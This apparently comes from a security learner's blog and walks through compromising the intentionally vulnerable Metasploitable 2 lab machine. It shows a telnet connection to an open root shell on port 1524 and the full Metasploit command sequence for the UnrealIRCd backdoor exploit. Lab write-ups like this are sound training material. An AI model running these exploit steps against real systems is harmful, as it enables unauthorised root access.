Metasploitable 2 – Compromise: Root Shell

Remember our Nmap results? (https://securityaspirations.com/2017/06/25/metasploitable-2-system-recon/)

One of the entries in there was listed as follows:

1524/tcp  open  shell       Metasploitable root shell

This is probably one of the simplest Metasploitable vulns. There is a root shell open on the box, lets see if we can connect to it with telnet

telnet 192.168.168.134 1524

  • Telnet <dest_IP> <dest_Port>

 

Metasploitable root login

Surprisingly we are connected to the shell without being prompted for credentials.

A quick check with ‘whoami’ and ‘hostname’ commands confirms we are root and on the metasploitable box.

 

 

Metasploitable 2 – Compromise: UnrealIRC

Lets take a look at this Nmap result in more detail:

6667/tcp  open  irc         UnrealIRCd

Nessus results also show some details here:

Critical (10.0) 46882 UnrealIRCd Backdoor Detection

Worth checking to see if Metasploit has a module we can use here. Fire up Metasploit with:

msfconsole

And lets do a search for any hits on ‘unrealirc’:

search unrealirc

Metasploit_unrealirc

Great we have a hit, lets choose this exploit:

use exploit/unix/irc/unreal_ircd_3281_backdoor

use_unreal_exploit

We now need to configure it. To see what’s required, use:

show options

metasploit_unreal_show-options

Lets set our target (using our Metasploitable IP address) with:

set RHOST 192.168.168.134

Once done you can run ‘show options’ again to confirm it looks good:

metasploit_unrealirc_rhost

Now lets see if it works by typing ‘run’

run

Metasploit_unrealirc_exploit_run

Be aware that you may not get much feedback even if the exploit is successful.

Try typing ‘hostname’ as above and see what comes back. As you can see the exploit was successful, we have root access to the metasploitable box once more.